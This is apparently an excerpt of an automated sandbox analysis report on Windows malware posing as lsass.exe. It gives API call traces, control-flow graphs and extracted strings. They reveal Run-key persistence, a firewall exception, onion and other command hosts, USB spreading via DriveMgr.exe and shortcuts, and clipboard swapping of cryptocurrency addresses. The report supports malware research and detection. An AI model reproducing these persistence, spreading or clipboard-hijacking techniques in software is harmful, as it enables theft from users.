              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 0078192A
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781935
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781945
              • DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 00781950
              • Sleep.KERNEL32(000007D0), ref: 0078195B
              • InternetCloseHandle.WININET(00000000), ref: 00781968
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 0078199B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007819BA
              • Sleep.KERNEL32(000007D0), ref: 007819C5
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007819D0
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007819E0
              • Sleep.KERNEL32(00001388), ref: 007819EB
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007819F6
              • Sleep.KERNEL32(00001388), ref: 00781A01
              • PathFileExistsA.SHLWAPI(3rvr3r3bru3urbu3rbub), ref: 00781A20
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781A2F
              • Sleep.KERNEL32(00000FA0), ref: 00781A3A
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781A45
              • Sleep.KERNEL32(000001F4), ref: 00781A50
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 00781A60
              • FindWindowA.USER32(38fh83hf83hf83hf38h,00000000), ref: 00781A6D
              • Sleep.KERNEL32(00001388), ref: 00781A8B
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781A96
              • SetForegroundWindow.USER32(00000000), ref: 00781AA3
              • Sleep.KERNEL32(000001F4), ref: 00781AAE
              • ShowWindow.USER32(00000000,00000001), ref: 00781ABD
              • Sleep.KERNEL32(00003A98), ref: 00781AC8
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,3rvr3r3bru3urbu3rbub), ref: 00781AD8
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781AE3
              • ShowWindow.USER32(00000000,00000000), ref: 00781AF2
              • Sleep.KERNEL32(000001F4), ref: 00781AFD
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781B08
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781B3F
              • Sleep.KERNEL32(00001388), ref: 00781B4A
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781B5A
              • PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 00781B67
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781BA6
              • Sleep.KERNEL32(00001388), ref: 00781BB3
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 00781BC0
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781BDA
              • SetForegroundWindow.USER32(00000000), ref: 00781BE7
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781BF7
              • SetFocus.USER32(00000000), ref: 00781C04
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C0F
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C1A
              • Sleep.KERNEL32(00000BB8), ref: 00781C25
              • Sleep.KERNEL32(000001F4), ref: 00781C57
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781C67
              • Sleep.KERNEL32(000003E8), ref: 00781C72
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C7D
              • Sleep.KERNELBASE(000001F4), ref: 00781C9E
              • ExitProcess.KERNEL32 ref: 00781CC0
              • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 0078205F
              • GetLastError.KERNEL32 ref: 0078206B
              • ExitProcess.KERNEL32 ref: 0078207A
              • PathFileExistsW.SHLWAPI(w4tw4yw4yw4tw4t), ref: 007820BF
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007820D7
              • Sleep.KERNEL32(00001388), ref: 007820E2
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 007820F4
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782104
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 0078213B
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782146
              • Sleep.KERNEL32(000007D0), ref: 00782153
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 00782160
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 0078217F
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 00782191
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 007821A1
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007821AC
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007821BC
              • Sleep.KERNEL32(00002710), ref: 007821C7
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 00782200
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00782210
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 00782220
              • FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 0078222F
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782252
              • Sleep.KERNEL32(00001F40), ref: 0078225D
              • DeleteFileW.KERNEL32(e5u5eue5ue5ue5ue5u), ref: 00782268
              • MoveFileA.KERNEL32(3r3hr8h38h8h38f8hff,3rvr3r3bru3urbu3rbub), ref: 00782278
              • Sleep.KERNEL32(000007D0), ref: 00782283
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782293
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: File$Sleep$Delete$Move$Window$Internet$CloseFind$HandleOpen$ForegroundShow$CopyExistsPath$ExitProcess$CreateErrorFocusLastMutex
              • String ID: sx$%ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$%s%s$,$2$38fh83hf83hf83hf38h$3r3hr8h38h8h38f8hff$3rvr3r3bru3urbu3rbub$433u3t$4tx$6$<sx$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$`sx$e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$http://7fv5nq57k4qvbrpt.onion/$http://www.48838389493.jo/$lsass.exe$lsass.exe$trx$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4twywyw4yw4yw4yw4y$w4yw4t4tw4twyw4y$x#$|sx$rx$rx$rx$rx
              • API String ID: 2034191202-3125172327
              • Opcode ID: 47e366b57e3c41671d5bb74564adf1941bfe459ca0c3a0dd80013527988474a4
              • Instruction ID: 4313bd316e56786ed74a7c8f74ae3e8556b7419df2f27b57f7cef0541c38c11d
              • Opcode Fuzzy Hash: 47e366b57e3c41671d5bb74564adf1941bfe459ca0c3a0dd80013527988474a4
              • Instruction Fuzzy Hash: AB233CB5AC0618EBD724ABA4DC4EBEC7A74BB48B05F24C184F30AA51D0DBBC5584CF56
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 322 780240-78027c memset GetLocaleInfoA strcmp 323 78027e-780280 322->323 324 780282 322->324 325 780284-780287 323->325 324->325
              APIs
              • memset.MSVCRT ref: 0078024E
              • GetLocaleInfoA.KERNELBASE(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 00780263
              • strcmp.MSVCRT ref: 00780272
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: InfoLocalememsetstrcmp
              • String ID: UKR
              • API String ID: 3255129521-64918367
              • Opcode ID: 447334b03f819a4eef5cace48aa49fb2926a4f2c2a473d35cc6f9ea9cd58ab2c
              • Instruction ID: dc85421b0ab6d02721871ab03f0a7a4f5c77470b67cc045793d99122205be1d8
              • Opcode Fuzzy Hash: 447334b03f819a4eef5cace48aa49fb2926a4f2c2a473d35cc6f9ea9cd58ab2c
              • Instruction Fuzzy Hash: C2E048B6EC4304B6DA40B6E09C4BF9977687715701F004154BB14961C1F5F9661C87E7
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 291 78427a-7842ef __set_app_type __p__fmode __p__commode call 7843f9 294 7842fd-784354 call 7843e4 _initterm __getmainargs _initterm 291->294 295 7842f1-7842fc __setusermatherr 291->295 298 784390-784393 294->298 299 784356-78435e 294->299 295->294 302 78436d-784371 298->302 303 784395-784399 298->303 300 784360-784362 299->300 301 784364-784367 299->301 300->299 300->301 301->302 304 784369-78436a 301->304 305 784373-784375 302->305 306 784377-784388 GetStartupInfoA 302->306 303->298 304->302 305->304 305->306 307 78438a-78438e 306->307 308 78439b-78439d 306->308 309 78439e-7843a9 GetModuleHandleA call 781360 307->309 308->309 311 7843ae-7843cb exit _XcptFilter 309->311
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
              • String ID:
              • API String ID: 801014965-0
              • Opcode ID: 2c01569e7a395912aa26291b4da20a2c4fb50c251cd309c1600cead311efec3d
              • Instruction ID: 5eb043ef8fed0ec6a9e3ad8ddc21209af20f50302c135087458bfb4e2d973259
              • Opcode Fuzzy Hash: 2c01569e7a395912aa26291b4da20a2c4fb50c251cd309c1600cead311efec3d
              • Instruction Fuzzy Hash: 9D418BB1CC034AEFDB20AFA4DC89AA97BB8FB09710F30411AF542A7691D7BC4840CB15
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 312 780290-7802c0 memset InternetOpenA 313 780339-780343 InternetCloseHandle 312->313 314 7802c2-7802e0 InternetOpenUrlA 312->314 317 780345-780348 313->317 315 78032f-780333 InternetCloseHandle 314->315 316 7802e2-78030b InternetReadFile call 780350 314->316 315->313 316->315 320 78030d-780329 strcmp 316->320 320->315 321 78032b-78032d 320->321 321->317
              APIs
              • memset.MSVCRT ref: 0078029E
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007802B3
              • InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 007802D3
              • InternetReadFile.WININET(00000000,?,00000063,?), ref: 007802F0
                • Part of subcall function 00780350: strchr.MSVCRT ref: 0078035B
              • strcmp.MSVCRT ref: 0078031F
              • InternetCloseHandle.WININET(00000000), ref: 00780333
              • InternetCloseHandle.WININET(00000000), ref: 0078033D
              Strings
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 007802AE
              • http://api.wipmania.com/, xrefs: 007802CA
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$http://api.wipmania.com/
              • API String ID: 2867819534-3587109876
              • Opcode ID: 9f417bc266925de7af8b0af0c84b8401009afbb21bb2d22a61f804865d97091d
              • Instruction ID: 7e89e2bde388e628575cb2a84d385146dac386cd77ef0692364d502b9d7d2234
              • Opcode Fuzzy Hash: 9f417bc266925de7af8b0af0c84b8401009afbb21bb2d22a61f804865d97091d
              • Instruction Fuzzy Hash: AF2100B5E84308AFEB20EBB0DC4AF9D7B78AB44701F60451CB605AF1C1D6B96544CF55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 408 780b30-780b45 call 7841c0 411 780b4e-780c00 wsprintfW * 5 PathFileExistsW 408->411 412 780b47-780b49 408->412 414 780c02-780c23 call 7801e0 411->414 415 780c44-780c53 PathFileExistsW 411->415 413 780fe7-780fea 412->413 414->415 424 780c25-780c3e SetFileAttributesW DeleteFileW 414->424 417 780cbc-780ccb PathFileExistsW 415->417 418 780c55-780c64 PathFileExistsW 415->418 422 780ccd-780cd3 417->422 423 780d20-780d41 FindFirstFileW 417->423 420 780c88-780c97 PathFileExistsW 418->420 421 780c66-780c77 CreateDirectoryW 418->421 420->417 428 780c99-780cb6 CopyFileW SetFileAttributesW 420->428 421->420 427 780c79-780c82 SetFileAttributesW 421->427 429 780cf4-780d0e call 780930 422->429 430 780cd5-780cf2 call 780930 422->430 425 780fe1 423->425 426 780d47-780ddb 423->426 424->415 425->413 431 780de1-780df5 lstrcmpW 426->431 427->420 428->417 438 780d11-780d1a SetFileAttributesW 429->438 430->438 435 780e0d 431->435 436 780df7-780e0b lstrcmpW 431->436 440 780fb8-780fce FindNextFileW 435->440 436->435 439 780e12-780e23 436->439 438->423 441 780e34-780e3b 439->441 442 780e25-780e2e 439->442 440->431 443 780fd4-780fdb FindClose 440->443 444 780e69-780e72 441->444 445 780e3d-780e5a lstrcmpiW 441->445 442->441 443->425 448 780e79-780e8a 444->448 449 780e74 444->449 446 780e5c 445->446 447 780e5e-780e65 445->447 446->442 447->444 450 780e9b-780ea2 448->450 449->440 451 780f12-780f1b 450->451 452 780ea4-780ec1 PathMatchSpecW 450->452 455 780f1d 451->455 456 780f22-780f31 PathFileExistsW 451->456 453 780ec3 452->453 454 780ec5-780f0b wsprintfW SetFileAttributesW DeleteFileW 452->454 453->450 454->451 455->440 458 780f38-780f88 wsprintfW * 2 456->458 459 780f33 456->459 460 780f8a-780fa0 call 7809f0 458->460 461 780fa2-780fb2 MoveFileExW 458->461 459->440 460->440 461->440
              APIs
              • wsprintfW.USER32 ref: 00780B6F
              • wsprintfW.USER32 ref: 00780B8F
              • wsprintfW.USER32 ref: 00780BAF
              • wsprintfW.USER32 ref: 00780BCF
              • wsprintfW.USER32 ref: 00780BE8
              • PathFileExistsW.SHLWAPI(?), ref: 00780BF8
              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00780C31
              • DeleteFileW.KERNEL32(?), ref: 00780C3E
              • PathFileExistsW.SHLWAPI(?), ref: 00780C4B
              • PathFileExistsW.SHLWAPI(?), ref: 00780C5C
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00780C6F
              • SetFileAttributesW.KERNEL32(?,00000007), ref: 00780C82
              • PathFileExistsW.SHLWAPI(?), ref: 00780C8F
              • CopyFileW.KERNEL32(0078A128,?,00000000), ref: 00780CA7
              • SetFileAttributesW.KERNEL32(?,00000001), ref: 00780CB6
              • PathFileExistsW.SHLWAPI(?), ref: 00780CC3
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: File$ExistsPathwsprintf$Attributes$CopyCreateDeleteDirectory
              • String ID: $qx$%s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$0qx$<qx$Hqx$Tqx$`qx$lpx$lqx$shell32.dll$shell32.dll$xqx
              • API String ID: 3616058356-816382982
              • Opcode ID: 33210e50b8687059884b798df35da6846f88fc8251e0c34126ef035c174a8b58
              • Instruction ID: a11364174ad4a27f695f6ee2448d3ed917842ac323b1e42ff4553dea05f4b96a
              • Opcode Fuzzy Hash: 33210e50b8687059884b798df35da6846f88fc8251e0c34126ef035c174a8b58
              • Instruction Fuzzy Hash: F6C172B198021C9FCB64EF60DC98EEA7778BF44700F5485D8F10AE6141E7789A98CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
              • String ID: 0$`lx$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$llx
              • API String ID: 2251388001-3598172751
              • Opcode ID: fc7f48c0ac2652686ad2f31e39c26b1a19cb7a7ab87950f5e872e2da9ae19478
              • Instruction ID: 1b20f81c3162a86bb587d8078e6f6277b8cfe1737c59dfe0258fde60b8d1aa2f
              • Opcode Fuzzy Hash: fc7f48c0ac2652686ad2f31e39c26b1a19cb7a7ab87950f5e872e2da9ae19478
              • Instruction Fuzzy Hash: 92125EB5A04288ABCF14CF64C6D457E7FB6AF43396F64C0A9D8599F215C7389A80CB81
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockiswalphaiswdigitlstrlenmemcpywcslen
              • String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$dex$dex
              • API String ID: 2964143298-3838210704
              • Opcode ID: 9bd23431d3ca653ecfc886f7c942037a049d0abc445fc312dda6ec0dc0ddc014
              • Instruction ID: fdcc26e8b4217c243f76d140f9a2c2e79caf8b96dbf6edb1a20b38cec9c8cbc7
              • Opcode Fuzzy Hash: 9bd23431d3ca653ecfc886f7c942037a049d0abc445fc312dda6ec0dc0ddc014
              • Instruction Fuzzy Hash: A61235B1A00219EBCF58DF50C6944BD7BB2BF42795FA0C069E8899F254D738DE90DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1245 77fe60-77fe92 CryptImportKey 1246 780076-78007c 1245->1246 1247 77fe98-77feb8 CreateFileW 1245->1247 1248 78006c-780070 CryptDestroyKey 1247->1248 1249 77febe-77fed1 GetFileSize 1247->1249 1248->1246 1250 77fed7-77fef2 CreateFileMappingA 1249->1250 1251 780062-780066 CloseHandle 1249->1251 1252 78003e-780044 1250->1252 1253 77fef8-77ff11 MapViewOfFile 1250->1253 1251->1248 1252->1251 1254 780046-78005c SetFilePointer SetEndOfFile 1252->1254 1255 77ff17-77ff20 1253->1255 1256 780034-780038 CloseHandle 1253->1256 1254->1251 1257 77ff26-77ff2d 1255->1257 1258 78002a-78002e UnmapViewOfFile 1255->1258 1256->1252 1257->1258 1259 77ff33-77ff3c 1257->1259 1258->1256 1259->1258 1260 77ff42-77ff5e CryptCreateHash 1259->1260 1260->1258 1261 77ff64-77ffa1 GetProcessHeap HeapAlloc 1260->1261 1261->1258 1262 77ffa7-77ffdc call 77fd80 CryptHashData 1261->1262 1265 77ffde-77fffd CryptVerifySignatureA 1262->1265 1266 780017-780024 GetProcessHeap HeapFree 1262->1266 1265->1266 1267 77ffff-780014 memcpy 1265->1267 1266->1258 1267->1266
              APIs
              • CryptImportKey.ADVAPI32(00000000,00785940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FE8A
              • CreateFileW.KERNEL32(00780750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FEAB
              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0077FEC4
              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 0077FEE5
              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0077FF04
              • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 0077FF56
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0077FF8D
              • HeapAlloc.KERNEL32(00000000), ref: 0077FF94
                • Part of subcall function 0077FD80: memcpy.MSVCRT ref: 0077FDDF
                • Part of subcall function 0077FD80: memcpy.MSVCRT ref: 0077FDF3
                • Part of subcall function 0077FD80: CryptImportKey.ADVAPI32(00000000,00000008,0000001C,00000000,00000000,00000000), ref: 0077FE17
                • Part of subcall function 0077FD80: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 0077FE3D
                • Part of subcall function 0077FD80: CryptDestroyKey.ADVAPI32(00000000), ref: 0077FE50
              • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 0077FFD4
              • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 0077FFF5
              • memcpy.MSVCRT ref: 0078000F
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0078001D
              • HeapFree.KERNEL32(00000000), ref: 00780024
              • UnmapViewOfFile.KERNEL32(00000000), ref: 0078002E
              • CloseHandle.KERNEL32(00000000), ref: 00780038
              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00780052
              • SetEndOfFile.KERNEL32(000000FF), ref: 0078005C
              • CloseHandle.KERNEL32(000000FF), ref: 00780066
              • CryptDestroyKey.ADVAPI32(00000000), ref: 00780070
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
              • String ID: NGS!
              • API String ID: 1316431928-4070929822
              • Opcode ID: 509225d11d4a8d2ee5d2508d1c46b086076f6c763362beaea5b9df63c71cb64c
              • Instruction ID: 4ca2784053d65fe1ce15f5b8195117e57b4b6eddafd8709520c0210c44ac7249
              • Opcode Fuzzy Hash: 509225d11d4a8d2ee5d2508d1c46b086076f6c763362beaea5b9df63c71cb64c
              • Instruction Fuzzy Hash: 52611175A40209EFDB14DBE4CD49FAEBBB5BB48700F248548F605BB280D779A940CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1608 7809f0-780a3f CreateDirectoryW wsprintfW FindFirstFileW 1609 780b1f-780b22 1608->1609 1610 780a45-780a59 lstrcmpW 1608->1610 1611 780a5b-780a6f lstrcmpW 1610->1611 1612 780a71 1610->1612 1611->1612 1614 780a73-780abc wsprintfW * 2 1611->1614 1613 780aec-780b02 FindNextFileW 1612->1613 1613->1610 1617 780b08-780b19 FindClose RemoveDirectoryW 1613->1617 1615 780abe-780ad4 call 7809f0 1614->1615 1616 780ad6-780ae6 MoveFileExW 1614->1616 1615->1613 1616->1613 1617->1609
              APIs
              • CreateDirectoryW.KERNEL32(00780F9D,00000000), ref: 007809FF
              • wsprintfW.USER32 ref: 00780A15
              • FindFirstFileW.KERNEL32(?,?), ref: 00780A2C
              • lstrcmpW.KERNEL32(?,00787048), ref: 00780A51
              • lstrcmpW.KERNEL32(?,0078704C), ref: 00780A67
              • wsprintfW.USER32 ref: 00780A8A
              • wsprintfW.USER32 ref: 00780AAA
              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00780AE6
              • FindNextFileW.KERNEL32(000000FF,?), ref: 00780AFA
              • FindClose.KERNEL32(000000FF), ref: 00780B0F
              • RemoveDirectoryW.KERNEL32(?), ref: 00780B19
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
